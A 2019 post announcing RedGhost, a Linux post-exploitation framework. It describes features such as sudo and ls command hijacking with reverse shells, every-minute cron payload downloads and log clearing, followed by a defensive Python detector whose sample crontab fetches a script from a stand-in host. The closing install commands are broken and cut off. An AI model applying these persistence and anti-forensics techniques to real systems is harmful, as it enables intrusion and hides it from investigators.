Friday 19 July 2019

RedGhost - Linux Post Exploitation Framework

RedGhost is a Linux post-exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

  • Payloads
Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl

  • SudoInject
Function to inject the "sudo" command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation

  • lsInject
Function to inject the "ls" command with a wrapper function that runs a payload every time "ls" is run, for persistence

  • Crontab
Function to create a cron job that downloads a payload from a remote server and runs it every minute, for persistence

  • GetRoot
Function to try various methods to escalate privileges

  • Clearlogs
Function to clear logs and make forensic investigation difficult

  • MassInfoGrab
Function to grab mass reconnaissance/information on the system

  • CheckVM
Function to check if the system is a virtual machine

  • MemoryExec
Function to execute a remote bash script in memory

  • BanIp
Function to ban an IP address using iptables
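
For defenders, the SudoInject, lsInject and Crontab items above leave checkable artifacts: a shell function or alias that shadows "sudo" or "ls", and a cron entry that runs every minute and fetches from a remote server. The following is an added detection example, not code from RedGhost or from the original post. It assumes the wrappers are written to shell startup files such as ~/.bashrc (the page does not say where); the function names and sample data are hypothetical and constructed for illustration.

```python
import re

# A shell function or alias named after a core command takes precedence over the binary on PATH.
SHADOW_RE = re.compile(
    r"^\s*(?:function\s+(?P<f1>sudo|ls)\b"
    r"|(?P<f2>sudo|ls)\s*\(\s*\)"
    r"|alias\s+(?P<a>sudo|ls)=(?P<body>.*))"
)
# Aliases that only add flags to ls (e.g. --color=auto) are routine and skipped.
BENIGN_ALIAS_RE = re.compile(r"""^['"]?ls(\s+-{1,2}[\w=-]+)*['"]?\s*$""")
# Cron line scheduled every minute whose command downloads something.
CRON_RE = re.compile(r"^\s*\*(?:/1)?\s+(?:\*\s+){4}.*\b(?:wget|curl)\b")


def scan_shell_rc(text, source="<rc>"):
    """Return (source, line_no, reason) for each sudo/ls wrapper definition."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = SHADOW_RE.match(line)
        if not m:
            continue
        if m.group("a") and BENIGN_ALIAS_RE.match(m.group("body").strip()):
            continue
        name = m.group("f1") or m.group("f2") or m.group("a")
        findings.append((source, n, f"'{name}' is shadowed by a function or alias"))
    return findings


def scan_crontab(text, source="<crontab>"):
    """Return (source, line_no, reason) for every-minute jobs that fetch remotely."""
    return [(source, n, "every-minute job invoking wget/curl")
            for n, line in enumerate(text.splitlines(), 1)
            if CRON_RE.match(line)]


# Constructed samples (not taken from RedGhost); the wrappers here just pass through.
SAMPLE_RC = """\
alias ls='ls --color=auto'
alias ll='ls -l'
sudo() {
    /usr/bin/sudo "$@"
}
function ls { command ls "$@"; }
"""
SAMPLE_CRON = """\
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q http://example.invalid/job.sh -O /tmp/job.sh
"""

if __name__ == "__main__":
    for finding in scan_shell_rc(SAMPLE_RC) + scan_crontab(SAMPLE_CRON):
        print(*finding, sep=": ")
```

On a real host, pass in the contents of each user's shell startup files and the output of `crontab -l`; any hit on "sudo" deserves manual review, since legitimate configurations rarely redefine it.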


Install RedGhost with one line:

wget; chmod +x; ./

One line to install the prerequisites and RedGhost:

wget; chmod +x; apt-get install dialog; apt-g
